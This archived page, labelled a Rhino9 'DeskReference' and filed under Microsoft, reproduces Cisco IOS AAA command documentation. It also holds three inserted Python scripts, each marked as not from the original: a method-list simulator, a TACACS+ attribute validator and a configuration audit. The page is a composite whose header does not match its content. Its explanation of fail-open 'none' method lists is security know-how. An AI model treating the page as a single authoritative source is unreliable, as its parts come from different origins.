Archive Date: 21-04-2001
Category: Information Technologies
Sub-Category: Microsoft

      http://www.infosyssec.org/infosyssec/TheMHD.html

      The MH DeskReference
      Version 1.2
      Written/Assembled by
      The Rhino9 Team
      enable Uses the enable password for authentication.
      line Uses the line password for authentication.
      none Uses no authentication.
      tacacs+ Uses TACACS+ authentication.
      radius Uses RADIUS authentication.
      Note This command cannot be used with TACACS or extended TACACS.
      Example
      The following example creates an authentication list that first tries to contact a TACACS+ server. If no server can be found, AAA tries to use the enable password. If this attempt also returns an error (because no enable password is configured on the server), the user is allowed access with no authentication.
      aaa authentication enable default tacacs+ enable none
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.

      aaa authentication local-override
      aaa authorization
      aaa new-model

      enable password †
       
      [12.2.5] aaa authentication local-override
      To configure the Cisco IOS software to check the local user database for authentication before attempting another form of authentication, use the aaa authentication local-override global configuration command. Use the no form of this command to disable the override.
      aaa authentication local-override
      no aaa authentication local-override
      Syntax Description
      This command has no arguments or keywords.
      Default
      Override is disabled.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.3.
      This command is useful when you want to configure an override to the normal authentication process for certain personnel such as system administrators.
      When this override is set, the user is always prompted for the username. The system then checks to see if the entered username corresponds to a local account. If the username does not correspond to one in the local database, login proceeds with the methods configured with other aaa commands (such as aaa authentication login). Note that when using this command Username: is fixed as the first prompt.
      Example
      The following example enables AAA authentication override:
      aaa authentication local-override
      Related Commands
      aaa authentication arap
      aaa authentication enable default
      aaa authentication login
      aaa authentication ppp
      aaa new-model
      [12.2.6] aaa authentication login
      To set AAA authentication at login, use the aaa authentication login global configuration command. Use the no form of this command to disable AAA authentication.
      aaa authentication login {default | list-name} method1 [...[method4]]
      no aaa authentication login {default | list-name} method1 [...[method4]]
      Syntax Description
      default Uses the listed authentication methods that follow this argument as the default list of methods when a user logs in.
      list-name Character string used to name the following list of authentication methods activated when a user logs in.
      method At least one and up to four of the keywords described in Table 3.
      Default
      If the default list is not set, only the local user database is checked. This version has the same effect as the following command:
      aaa authentication login default local
      Note On the console, login will succeed without any authentication checks if default is not set.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.3.
      The default and optional list names that you create with the aaa authentication login command are used with the login authentication command.
      Create a list by entering the aaa authentication list-name method command for a particular protocol, where list-name is any character string used to name this list (such as MIS-access). The method argument identifies the list of methods that the authentication algorithm tries, in the given sequence. Method keywords are described in Table 3.
      To create a default list that is used if no list is assigned to a line, use the login authentication command with the default argument followed by the methods you want to use in default situations.
      The additional methods of authentication are used only if the previous method returns an error, not if it fails. To ensure that the authentication succeeds even if all methods return an error, specify none as the final method in the command line.
      If authentication is not specifically set for a line, the default is to deny access and no authentication is performed. Use the show running-config command to display currently configured lists of authentication methods.
      Table 3 AAA Authentication Login Methods
      Keyword Description
      enable Uses the enable password for authentication.
      krb5 Uses Kerberos 5 for authentication.
      line Uses the line password for authentication.
      local Uses the local username database for authentication.
      none Uses no authentication.
      radius Uses RADIUS authentication.
      tacacs+ Uses TACACS+ authentication.
      krb5-telnet Uses Kerberos 5 Telnet authentication protocol when using Telnet to connect to the router.
      Note This command cannot be used with TACACS or extended TACACS.
      Examples
      The following example creates an AAA authentication list called MIS-access. This authentication first tries to contact a TACACS+ server. If no server is found, TACACS+ returns an error and AAA tries to use the enable password. If this attempt also returns an error (because no enable password is configured on the server), the user is allowed access with no authentication.
      aaa authentication login MIS-access tacacs+ enable none
      The following example creates the same list, but it sets it as the default list that is used for all login authentications if no other list is specified:
      aaa authentication login default tacacs+ enable none
      The following example sets authentication at login to use the Kerberos 5 Telnet authentication protocol when using Telnet to connect to the router:
      aaa authentication login default KRB5-TELNET krb5
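      The examples above rely on the rule in the usage guidelines: a later method is consulted only when the previous one returns an error, never when it fails. The following simulation, added here and not taken from the DeskReference or from Cisco, walks a method list the same way; the RouterState fields, the function names and the credentials are constructed for the example, and treating an unknown local user as an error is an assumption of the simulation.

```python
"""Simulate how a Cisco IOS AAA authentication method list is walked.
The next method is tried only when the previous one returns an ERROR
(e.g. no TACACS+ server can be reached, no enable password configured);
a FAIL (wrong credentials) ends the walk with access denied."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

PASS, FAIL, ERROR = "PASS", "FAIL", "ERROR"


@dataclass
class RouterState:
    """Constructed state for the simulation; not a Cisco data structure."""
    tacacs_reachable: bool = True
    radius_reachable: bool = True
    tacacs_users: Dict[str, str] = field(default_factory=dict)
    radius_users: Dict[str, str] = field(default_factory=dict)
    local_users: Dict[str, str] = field(default_factory=dict)
    enable_password: Optional[str] = None
    line_password: Optional[str] = None


def _check_db(db: Dict[str, str], user: str, password: str) -> str:
    return PASS if db.get(user) == password else FAIL


def run_method(method: str, st: RouterState, user: str, password: str) -> str:
    """Outcome of one Table 3 keyword. Simulation assumptions: an unreachable
    server and an unconfigured password both count as ERROR, as the chapter's
    examples describe; an unknown local user is treated as ERROR so that a
    later method can be consulted."""
    if method == "tacacs+":
        return _check_db(st.tacacs_users, user, password) if st.tacacs_reachable else ERROR
    if method == "radius":
        return _check_db(st.radius_users, user, password) if st.radius_reachable else ERROR
    if method == "local":
        return ERROR if user not in st.local_users else _check_db(st.local_users, user, password)
    if method == "enable":
        if st.enable_password is None:
            return ERROR
        return PASS if password == st.enable_password else FAIL
    if method == "line":
        if st.line_password is None:
            return ERROR
        return PASS if password == st.line_password else FAIL
    if method == "none":
        return PASS
    raise ValueError(f"unsupported method keyword: {method}")


def parse_login_list(command: str) -> Tuple[str, List[str]]:
    """Extract (list name, methods) from an 'aaa authentication login' line."""
    tokens = command.split()
    if tokens[:3] != ["aaa", "authentication", "login"] or len(tokens) < 5:
        raise ValueError("expected: aaa authentication login {default|list-name} method1 [...]")
    methods = tokens[4:]
    if len(methods) > 4:
        raise ValueError("at most four methods are allowed")
    return tokens[3], methods


def authenticate(methods: List[str], st: RouterState, user: str, password: str) -> Tuple[str, List[str]]:
    """Walk the list in order. Returns the final result plus a per-method trace.
    ERROR at the end means every method errored and access is denied."""
    trace: List[str] = []
    for m in methods:
        result = run_method(m, st, user, password)
        trace.append(f"{m}:{result}")
        if result != ERROR:
            return result, trace
    return ERROR, trace


if __name__ == "__main__":
    _, methods = parse_login_list("aaa authentication login MIS-access tacacs+ enable none")
    healthy = RouterState(tacacs_users={"alice": "s3cret"}, enable_password="en-pw")
    # Wrong password with TACACS+ reachable: FAIL, no fallthrough to enable/none
    print(authenticate(methods, healthy, "alice", "wrong"))
    outage = RouterState(tacacs_reachable=False)
    # Server down and no enable password: every method errors, none grants access
    print(authenticate(methods, outage, "anyone", "anything"))
```

      The second run is the fail-open case the example text describes: an unreachable server plus a missing enable password lets any user in, so a list ending in none trades availability for authentication.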
      Related Commands
      A dagger (†) indicates that this command is documented outside this chapter.
      aaa authentication local-override
      aaa new-model
      login authentication †
       
      [12.2.7] aaa authentication nasi
      To specify AAA authentication for Netware Asynchronous Services Interface (NASI) clients connecting through the access server, use the aaa authentication nasi global configuration command. Use the no form of this command to disable authentication for NASI clients.
      aaa authentication nasi {default | list-name} method1 [...[method4]]
      no aaa authentication nasi {default | list-name} method1 [...[method4]]
      Syntax Description
      default Makes the listed authentication methods that follow this argument the default list of methods used when a user logs in.
      list-name Character string used to name the following list of authentication methods activated when a user logs in.
      methods At least one and up to four of the methods described in Table 4.
      Default
      If the default list is not set, only the local user database is selected. This setting has the same effect as the following command:
      aaa authentication nasi default local
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      The default and optional list names that you create with the aaa authentication nasi command are used with the nasi authentication command.
      Create a list by entering the aaa authentication nasi command, where list-name is any character string that names this list (such as MIS-access). The method argument identifies the list of methods the authentication algorithm tries in the given sequence.
      To create a default list that is used if no list is assigned to a line with the nasi authentication command, use the default argument followed by the methods that you want to use in default situations.
      The remaining methods of authentication are used only if the previous method returns an error, not if it fails. To ensure that the authentication succeeds even if all methods return an error, specify none as the final method in the command line.
      If authentication is not specifically set for a line, the default is to deny access and no authentication is performed. Use the show running-config command to display currently configured lists of authentication methods.
      Table 4 AAA Authentication NASI Methods
      Keyword Description
      enable Uses the enable password for authentication.
      line Uses the line password for authentication.
      local Uses the local username database for authentication.
      none Uses no authentication.
      tacacs+ Uses TACACS+ authentication.
      Note This command cannot be used with TACACS or extended TACACS.
      Examples
      The following example creates an AAA authentication list called list1. This authentication first tries to contact a TACACS+ server. If no server is found, TACACS+ returns an error and AAA tries to use the enable password. If this attempt also returns an error (because no enable password is configured on the server), the user is allowed access with no authentication.
      aaa authentication nasi list1 tacacs+ enable none
      The following example creates the same list, but sets it as the default list that is used for all login authentications if no other list is specified:
      aaa authentication nasi default tacacs+ enable none
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      ipx nasi-server enable †
      nasi authentication
      show ipx nasi connections †
      show ipx spx-protocol †
       
      [12.2.8] aaa authentication password-prompt
      To change the text displayed when users are prompted for a password, use the aaa authentication password-prompt global configuration command. Use the no form of this command to return to the default password prompt text.
      aaa authentication password-prompt {text-string}
      no aaa authentication password-prompt {text-string}
      Syntax Description
      text-string String of text that will be displayed when the user is prompted to enter a password. If this text-string contains spaces or unusual characters, it must be enclosed in double-quotes (for example, "Enter your password:").
      Default
      This command is disabled by default.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.0.
      Use the aaa authentication password-prompt command to change the default text that the Cisco IOS software displays when prompting a user to enter a password. This command changes the password prompt for the enable password as well as for login passwords that are not supplied by remote security servers. The no form of this command returns the password prompt to the default value:
      Password:
      The aaa authentication password-prompt command does not change any dialog that is supplied by a remote TACACS+ or RADIUS server.
      Example
      The following example changes the text for the password prompt:
      aaa authentication password-prompt "Enter your password now:"
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      aaa authentication username prompt
      aaa new-model
      enable password †
       
      [12.2.9] aaa authentication ppp
      To specify one or more AAA authentication methods for use on serial interfaces running Point-to-Point Protocol (PPP) and TACACS+, use the aaa authentication ppp global configuration command. Use the no form of this command to disable authentication.
      aaa authentication ppp {default | list-name} method1 [...[method4]]
      no aaa authentication ppp {default | list-name} method1 [...[method4]]
      Syntax Description
      default Uses the listed authentication methods that follow this argument as the default list of methods when a user logs in.
      list-name Character string used to name the following list of authentication methods tried when a user logs in.
      method At least one and up to four of the keywords described in Table 5.
      Default
      If the default list is not set, only the local user database is checked. This command has the same effect as the following command:
      aaa authentication ppp default local
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.3.
      The lists that you create with the aaa authentication ppp command are used with the ppp authentication command. These lists contain up to four authentication methods that are used when a user tries to log in to the serial interface.
      Create a list by entering the aaa authentication ppp list-name method command, where list-name is any character string used to name this list (such as MIS-access). The method argument identifies the list of methods that the authentication algorithm tries in the given sequence. You can enter up to four methods. Method keywords are described in Table 5.
      The additional methods of authentication are only used if the previous method returns an error, not if it fails. Specify none as the final method in the command line to have authentication succeed even if all methods return an error.
      If authentication is not specifically set for a function, the default is none and no authentication is performed. Use the show running-config command to display lists of authentication methods.
      Table 5 AAA Authentication PPP Methods
      Keyword Description
      if-needed Does not authenticate if user has already been authenticated on a TTY line.
      krb5 Uses Kerberos 5 for authentication (can only be used for PAP authentication).
      local Uses the local username database for authentication.
      none Uses no authentication.
      radius Uses RADIUS authentication.
      tacacs+ Uses TACACS+ authentication.
      Note This command cannot be used with TACACS or extended TACACS.
      Example
      The following example creates an AAA authentication list called MIS-access for serial lines that use PPP. This authentication first tries to contact a TACACS+ server. If this action returns an error, the user is allowed access with no authentication.
      aaa authentication ppp MIS-access tacacs+ none
      Related Commands
      A dagger (†) indicates that this command is documented outside this chapter.
      aaa authentication local-override
      aaa new-model
      ppp authentication
      [12.3.0] aaa authentication username-prompt
      To change the text displayed when users are prompted to enter a username, use the aaa authentication username-prompt global configuration command. Use the no form of this command to return to the default username prompt text.
      aaa authentication username-prompt {text-string}
      no aaa authentication username-prompt {text-string}
      Syntax Description
      text-string String of text that will be displayed when the user is prompted to enter a username. If this text-string contains spaces or unusual characters, it must be enclosed in double-quotes (for example, "Enter your name:").
      Default
      This command is disabled by default.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.0.
      Use the aaa authentication username-prompt command to change the default text that the Cisco IOS software displays when prompting a user to enter a username. The no form of this command returns the username prompt to the default value:
      Username:
      Some protocols (for example, TACACS+) have the ability to override the use of local username prompt information. Using the aaa authentication username-prompt command will not change the username prompt text in these instances.
      Note The aaa authentication username-prompt command does not change any dialog that is supplied by a remote TACACS+ server.
      Example
      The following example changes the text for the username prompt:
      aaa authentication username-prompt "Enter your name here:"
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      aaa authentication password-prompt
      aaa new-model
      enable password †
       
      [12.3.1] aaa authorization
      Use the aaa authorization global configuration command to set parameters that restrict a user's network access. Use the no form of this command to disable authorization for a function.
      aaa authorization {network | exec | command level} method
      no aaa authorization {network | exec | command level}
      Syntax Description
      network Runs authorization for all network-related service requests, including SLIP, PPP, PPP NCPs, and ARA protocol.
      exec Runs authorization to determine if the user is allowed to run an EXEC shell. This facility might return user profile information such as autocommand information.
      command Runs authorization for all commands at the specified privilege level.
      level Specific command level that should be authorized. Valid entries are 0 through 15.
      method One of the keywords in Table 6.
      Default
      Authorization is disabled for all actions (equivalent to the keyword none).
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      Note There are five commands associated with privilege level 0: disable, enable, exit, help, and logout. If you configure AAA authorization for a privilege level greater than 0, these five commands will not be included in the privilege level command set.
      Use the aaa authorization command to create at least one, and up to four, authorization methods that can be used when a user accesses the specified function.
      Note This command, along with aaa accounting, replaces the tacacs-server suite of commands in previous versions of TACACS.
      The additional methods of authorization are used only if the previous method returns an error, not if it fails. Specify none as the final method in the command line to have authorization succeed even if all methods return an error.
      If authorization is not specifically set for a function, the default is none and no authorization is performed.
      Table 6 AAA Authorization Methods
      Keyword Description
      tacacs+ Requests authorization information from the TACACS+ server.
      if-authenticated Allows the user to access the requested function if the user is authenticated.
      none No authorization is performed.
      local Uses the local database for authorization.
      radius Uses RADIUS to get authorization information.
      krb5-instance Uses the instance defined by the Kerberos instance map command.
      The authorization command causes a request packet containing a series of attribute value pairs to be sent to the TACACS daemon as part of the authorization process. The daemon can do one of the following:
      • Accept the request as is
      • Make changes to the request
      • Refuse the request, and hence, refuse authorization
      Table 7 describes attribute value (AV) pairs associated with the aaa authorization command. Registered users can find more information about TACACS+ and attribute pairs on Cisco Connection Online (CCO).
      Attribute | Description | Cisco IOS Release 11.0 | Cisco IOS Release 11.1 | Cisco IOS Release 11.2
      service=x The primary service. Specifying a service attribute indicates that this is a request for authorization or accounting of that service. Current values are slip, ppp, arap, shell, tty-daemon, connection, and system. This attribute must always be included. yes yes yes
      protocol=x A protocol that is a subset of a service. An example would be any PPP NCP. Currently known values are lcp, ip, ipx, atalk, vines, lat, xremote, tn3270, telnet, rlogin, pad, vpdn, http, and unknown. yes yes yes
      cmd=x A shell (EXEC) command. This indicates the command name for a shell command that is to be run. This attribute must be specified if service equals "shell." A NULL value indicates that the shell itself is being referred to. yes yes yes
      cmd-arg=x An argument to a shell (EXEC) command. This indicates an argument for the shell command that is to be run. Multiple cmd-arg attributes may be specified, and they are order dependent. yes yes yes
      acl=x ASCII number representing a connection access list. Used only when service=shell. yes yes yes
      inacl=x ASCII identifier for an interface input access list. Used with service=ppp and protocol=ip. yes yes yes
      inacl#<n> ASCII access list identifier for an input access list to be installed and applied to an interface for the duration of the current connection. Used with service=ppp and protocol=ip, and service=ppp and protocol=ipx. no no 11.2(4)F
      outacl=x ASCII identifier for an interface output access list. Used with service=ppp and protocol=ip, and service=ppp and protocol=ipx. Contains an IP output access list for SLIP or PPP/IP (for example, outacl=4). The access list itself must be preconfigured on the router. Per-user access lists do not currently work with ISDN interfaces. yes (PPP/IP only) yes yes
      outacl#<n> ASCII access list identifier for an interface output access list to be installed and applied to an interface for the duration of the current connection. Used with service=ppp and protocol=ip, and service=ppp and protocol=ipx. no no 11.2(4)F
      zonelist=x A numeric zonelist value. Used with service=arap. Specifies an AppleTalk zonelist for ARA (for example, zonelist=5). yes yes yes
      addr=x A network address. Used with service=slip, service=ppp, and protocol=ip. Contains the IP address that the remote host should use when connecting via SLIP or PPP/IP. For example, addr=1.2.3.4. yes yes yes
      addr-pool=x Specifies the name of a local pool from which to get the address of the remote host. Used with service=ppp and protocol=ip.
      Note that addr-pool works in conjunction with local pooling. It specifies the name of a local pool (which must be preconfigured on the network access server). Use the ip-local pool command to declare local pools. For example:
      ip address-pool local
      ip local pool boo 1.0.0.1 1.0.0.10
      ip local pool moo 2.0.0.1 2.0.0.20
      You can then use TACACS+ to return addr-pool=boo or addr-pool=moo to indicate the address pool from which you want to get this remote node's address. yes yes yes
      routing=x Specifies whether routing information is to be propagated to, and accepted from this interface. Used with service=slip, service=ppp, and protocol=ip. Equivalent in function to the /routing flag in SLIP and PPP commands. Can either be true or false (for example, routing=true). yes yes yes
      route Specifies a route to be applied to an interface. Used with service=slip, service=ppp, and protocol=ip.
      During network authorization, the route attribute can be used to specify a per-user static route, to be installed by TACACS+ as follows:
      route="dst_address mask [gateway]"
      This indicates a temporary static route that is to be applied. dst_address, mask, and gateway are expected to be in the usual dotted-decimal notation, with the same meanings as in the familiar ip route configuration command on a network access server.
      If gateway is omitted, the peer's address is the gateway. The route is expunged when the connection terminates. no yes yes
      route#<n> Like the route AV pair, this specifies a route to be applied to an interface, but these routes are numbered, allowing multiple routes to be applied. Used with service=ppp and protocol=ip, and service=ppp and protocol=ipx. no no 11.2(4)F
      timeout=x The number of minutes before an ARA session disconnects (for example, timeout=60). A value of zero indicates no timeout. Used with service=arap. yes yes yes
      idletime=x Sets a value, in minutes, after which an idle session is terminated. Does not work for PPP. A value of zero indicates no timeout. no yes yes
      autocmd=x Specifies an autocommand to be executed at EXEC startup (for example, autocmd=telnet muruga.com). Used only with service=shell. yes yes yes
      noescape=x Prevents user from using an escape character. Used with service=shell. Can be either true or false (for example, noescape=true). yes yes yes
      nohangup=x Used with service=shell. Specifies the nohangup option. Can be either true or false (for example, nohangup=false). yes yes yes
      priv-lvl=x Privilege level to be assigned for the EXEC. Used with service=shell. Privilege levels range from 0 to 15, with 15 being the highest. yes yes yes
      callback-dialstring Sets the telephone number for a callback (for example: callback-dialstring=408-555-1212). Value is NULL, or a dial-string. A NULL value indicates that the service may choose to get the dialstring through other means. Used with service=arap, service=slip, service=ppp, service=shell. Not valid for ISDN. no yes yes
      callback-line The number of a TTY line to use for callback (for example: callback-line=4). Used with service=arap, service=slip, service=ppp, service=shell. Not valid for ISDN. no yes yes
      callback-rotary The number of a rotary group (between 0 and 100 inclusive) to use for callback (for example: callback-rotary=34). Used with service=arap, service=slip, service=ppp, service=shell. Not valid for ISDN. no yes yes
      nocallback-verify Indicates that no callback verification is required. The only valid value for this parameter is 1 (for example, nocallback-verify=1). Used with service=arap, service=slip, service=ppp, service=shell. There is no authentication on callback. Not valid for ISDN. no yes yes
      tunnel-id Specifies the username that will be used to authenticate the tunnel over which the individual user MID will be projected. This is analogous to the remote name in the vpdn outgoing command. Used with service=ppp and protocol=vpdn. no no yes
      ip-addresses Space-separated list of possible IP addresses that can be used for the end-point of a tunnel. Used with service=ppp and protocol=vpdn. no no yes
      nas-password Specifies the password for the network access server during the L2F tunnel authentication. Used with service=ppp and protocol=vpdn. no no yes
      gw-password Specifies the password for the home gateway during the L2F tunnel authentication. Used with service=ppp and protocol=vpdn. no no yes
      rte-ftr-in#<n> Specifies an input access list definition to be installed and applied to routing updates on the current interface for the duration of the current connection. Used with service=ppp and protocol=ip, and with service=ppp and protocol=ipx. no no 11.2(4)F
      rte-ftr-out#<n> Specifies an output access list definition to be installed and applied to routing updates on the current interface for the duration of the current connection. Used with service=ppp and protocol=ip, and with service=ppp and protocol=ipx. no no yes 11.2(4)F
      sap#<n> Specifies static Service Advertising Protocol (SAP) entries to be installed for the duration of a connection. Used with service=ppp and protocol=ipx. no no yes 11.2(4)F
      sap-fltr-in#<n> Specifies an input SAP filter access list definition to be installed and applied on the current interface for the duration of the current connection. Used with service=ppp and protocol=ipx. no no yes 11.2(4)F
      sap-fltr-out#<n> Specifies an output SAP filter access list definition to be installed and applied on the current interface for the duration of the current connection. Used with service=ppp and protocol=ipx. no no 11.2(4)F
      pool-def#<n> Used to define IP address pools on the network access server. Used with service=ppp and protocol=ip. no no 11.2(4)F
      source-ip=x Used as the source IP address of all VPDN packets generated as part of a VPDN tunnel. This is equivalent to the Cisco vpdn outgoing global configuration command. no no yes
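      Because the daemon's reply is applied to the interface or EXEC session more or less as received, a network access server (or a test harness for a TACACS+ daemon) should check the AV pairs above against the table before acting on them. The parser and validator below are added here and are not Cisco code or a TACACS+ library; the function names and the sample replies are constructed, and the checks encode only the constraints Table 7 states (mandatory service, the value sets for service and protocol, priv-lvl 0 to 15, the quoted route form, true/false attributes, callback-rotary 0 to 100, nocallback-verify=1, the shell-only and PPP-only attributes).

```python
"""Parse and sanity-check a TACACS+ authorization reply expressed as the
attribute=value pairs of Table 7 before the network access server acts on
it. Helper names and sample replies are constructed for this example."""
import ipaddress
import re
import shlex
from typing import Dict, List, Tuple

SERVICES = {"slip", "ppp", "arap", "shell", "tty-daemon", "connection", "system"}
PROTOCOLS = {"lcp", "ip", "ipx", "atalk", "vines", "lat", "xremote", "tn3270",
             "telnet", "rlogin", "pad", "vpdn", "http", "unknown"}
BOOLEAN_ATTRS = {"routing", "noescape", "nohangup"}
MINUTE_ATTRS = {"timeout", "idletime"}
SHELL_ONLY = {"acl", "autocmd", "noescape", "nohangup", "priv-lvl"}
# Numbered per-connection attributes that Table 7 ties to service=ppp with protocol=ip or ipx
NUMBERED = re.compile(r"^(inacl|outacl|rte-ftr-in|rte-ftr-out|sap|sap-fltr-in|sap-fltr-out|pool-def)#\d+$")


def parse_av_pairs(reply: str) -> List[Tuple[str, str]]:
    """Split a reply such as 'service=ppp protocol=ip route="10.0.0.0 255.0.0.0"'
    into ordered (attribute, value) pairs, honouring the double quotes the route
    attribute requires. Order is kept because cmd-arg is order dependent."""
    pairs = []
    for token in shlex.split(reply):
        if "=" not in token:
            raise ValueError(f"not an attribute=value pair: {token!r}")
        attr, value = token.split("=", 1)
        pairs.append((attr, value))
    return pairs


def _dotted_quad(s: str) -> bool:
    try:
        ipaddress.IPv4Address(s)
        return True
    except ValueError:
        return False


def validate(pairs: List[Tuple[str, str]]) -> List[str]:
    """Return the problems found; an empty list means the reply is consistent
    with Table 7 and can be applied."""
    problems: List[str] = []
    attrs: Dict[str, str] = dict(pairs)
    service = attrs.get("service")
    protocol = attrs.get("protocol")
    if service is None:
        problems.append("service attribute must always be included")
    elif service not in SERVICES:
        problems.append(f"unknown service {service!r}")
    if protocol is not None and protocol not in PROTOCOLS:
        problems.append(f"unknown protocol {protocol!r}")
    if service == "shell" and "cmd" not in attrs:
        problems.append("cmd must be specified when service=shell (cmd= means the shell itself)")
    for attr, value in pairs:
        if attr in SHELL_ONLY and service != "shell":
            problems.append(f"{attr} is used only with service=shell")
        if attr == "priv-lvl" and not (value.isdigit() and 0 <= int(value) <= 15):
            problems.append(f"priv-lvl must be 0..15, got {value!r}")
        elif attr in BOOLEAN_ATTRS and value not in ("true", "false"):
            problems.append(f"{attr} must be true or false, got {value!r}")
        elif attr in MINUTE_ATTRS and not value.isdigit():
            problems.append(f"{attr} must be a number of minutes, got {value!r}")
        elif attr == "addr" and not _dotted_quad(value):
            problems.append(f"addr must be dotted-decimal, got {value!r}")
        elif attr == "route" or attr.startswith("route#"):
            # route="dst_address mask [gateway]": gateway defaults to the peer
            parts = value.split()
            if len(parts) not in (2, 3) or not all(_dotted_quad(p) for p in parts):
                problems.append(f"{attr} must be 'dst_address mask [gateway]', got {value!r}")
        elif attr == "callback-rotary" and not (value.isdigit() and 0 <= int(value) <= 100):
            problems.append(f"callback-rotary must be 0..100, got {value!r}")
        elif attr == "nocallback-verify" and value != "1":
            problems.append(f"nocallback-verify only accepts 1, got {value!r}")
        elif NUMBERED.match(attr) and (service != "ppp" or protocol not in ("ip", "ipx")):
            problems.append(f"{attr} requires service=ppp with protocol=ip or ipx")
    return problems
```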
      Examples
      The following example specifies that TACACS+ authorization is used for all network-related requests. If this authorization method returns an error (if the TACACS+ server cannot be contacted), no authorization is performed and the request succeeds.
      aaa authorization network tacacs+ none
      The following example specifies that TACACS+ authorization is run for level 15 commands. If this authorization method returns an error (that is, if the TACACS+ server cannot be contacted), no authorization is performed and the request succeeds.
      aaa authorization command 15 tacacs+ none
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      aaa accounting †
      aaa new-model
      [12.3.2] aaa authorization config-commands
      To disable AAA configuration command authorization in the EXEC mode, use the no form of the aaa authorization config-commands global configuration command. Use the standard form of this command to reestablish the default created when the aaa authorization command level method command was issued.
      aaa authorization config-commands
      no aaa authorization config-commands
      Syntax Description
      This command has no arguments or keywords.
      Default
      After the aaa authorization command level method has been issued, this command is enabled by default, meaning that all configuration commands in the EXEC mode will be authorized.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.2.
      If aaa authorization command level method is enabled, all commands, including configuration commands, are authorized by AAA using the method specified. Because there are configuration commands that are identical to some EXEC-level commands, there can be some confusion in the authorization process. Using no aaa authorization config-commands stops the network access server from attempting configuration command authorization.
      Once the no form of this command has been issued, AAA authorization of configuration commands is completely disabled. Care should be taken before issuing the no form of this command because it potentially reduces the amount of administrative control on configuration commands.
      Use the aaa authorization config-commands command if, after using the no form of this command, you need to reestablish the default set by the aaa authorization command level method command.
      Example
      The following example specifies that TACACS+ authorization is run for level 15 commands and that AAA authorization of configuration commands is disabled:
      aaa new-model
      aaa authorization command 15 tacacs+ none
      no aaa authorization config-commands
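      Several of the settings described in this chapter weaken control when they appear in a running configuration: method lists that end in none (fail open when a server errors), a missing aaa authentication login default list (console login succeeds with no checks), aaa authentication local-override, no aaa authorization config-commands, and TACACS+ in use without a tacacs-server key. The audit script below, added here and not part of the DeskReference or of any Cisco tool, reads a saved configuration and reports those conditions; the sample configuration, the finding codes and the function names are constructed for the example.

```python
"""Audit a saved Cisco IOS running-config for the AAA weaknesses this
chapter describes. The sample configuration is constructed for the example."""
import re
from typing import List, Tuple

SAMPLE_CONFIG = """\
!
aaa new-model
aaa authentication login MIS-access tacacs+ enable none
aaa authentication enable default tacacs+ enable none
aaa authentication local-override
aaa authorization network tacacs+ none
aaa authorization command 15 tacacs+ none
no aaa authorization config-commands
tacacs-server host 192.0.2.10
tacacs-server key EXAMPLE-KEY
!
"""

# aaa authentication {login|enable|ppp|nasi|arap} {default|list-name} method1 [... method4]
AUTHN = re.compile(r"^aaa authentication (login|enable|ppp|nasi|arap) (\S+) (.+)$")
# aaa authorization {network|exec|command level} method...
AUTHZ = re.compile(r"^aaa authorization (network|exec|command \d+) (.+)$")


def _check_methods(kind: str, methods: List[str], findings: List[Tuple[str, str]]) -> None:
    """Lists are walked until a method answers; none always answers PASS."""
    if methods == ["none"]:
        findings.append(("no-auth", f"{kind}: the only method is none"))
    elif methods[-1] == "none":
        findings.append(("fail-open", f"{kind}: list ends in none, so an error from "
                         f"{', '.join(methods[:-1])} (for example an unreachable server) grants access"))


def audit_aaa(config: str) -> List[Tuple[str, str]]:
    """Return (code, detail) findings for one configuration text."""
    findings: List[Tuple[str, str]] = []
    lines = [ln.strip() for ln in config.splitlines()]
    aaa_enabled = "aaa new-model" in lines
    if not aaa_enabled:
        findings.append(("no-new-model", "aaa new-model is absent: AAA is not enabled"))
    login_default = False
    uses_tacacs = False
    for ln in lines:
        m = AUTHN.match(ln)
        if m:
            kind, name, methods = m.group(1), m.group(2), m.group(3).split()
            if kind == "login" and name == "default":
                login_default = True
            uses_tacacs = uses_tacacs or "tacacs+" in methods
            _check_methods(f"authentication {kind} {name}", methods, findings)
            continue
        m = AUTHZ.match(ln)
        if m:
            methods = m.group(2).split()
            uses_tacacs = uses_tacacs or "tacacs+" in methods
            _check_methods(f"authorization {m.group(1)}", methods, findings)
            continue
        if ln == "aaa authentication local-override":
            findings.append(("local-override",
                             "local user database is checked before every other method; review local accounts"))
        elif ln == "no aaa authorization config-commands":
            findings.append(("config-commands",
                             "AAA authorization of configuration commands is disabled"))
    if aaa_enabled and not login_default:
        findings.append(("no-login-default",
                         "no 'aaa authentication login default' list: console login succeeds without any authentication checks"))
    if uses_tacacs and not any(ln.startswith("tacacs-server key") for ln in lines):
        findings.append(("no-tacacs-key", "tacacs+ is used but no tacacs-server key is set"))
    return findings


if __name__ == "__main__":
    for code, detail in audit_aaa(SAMPLE_CONFIG):
        print(f"[{code}] {detail}")
```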
      Related Commands
      aaa authorization
      [12.3.3] aaa new-model
      To enable the AAA access control model, issue the aaa new-model global configuration command. Use the no form of this command to disable this functionality.
      aaa new-model
      no aaa new-model
      Syntax Description
      This command has no arguments or keywords.
      Default
      AAA is not enabled.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      This command enables the AAA access control system and TACACS+. If you initialize AAA functionality and later decide to use TACACS or extended TACACS, issue the no version of this command before you enable the version of TACACS that you want to use.
      After enabling AAA/TACACS+ with the aaa new-model command, you must use the tacacs-server key command to set the authentication key used in all TACACS+ communications with the TACACS+ daemon.
      Example
      The following example initializes AAA and TACACS+:
      aaa new-model
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      aaa accounting †
      aaa authentication arap
      aaa authentication enable default
      aaa authentication local-override
      aaa authentication login
      aaa authentication ppp
      aaa authorization
      tacacs-server key
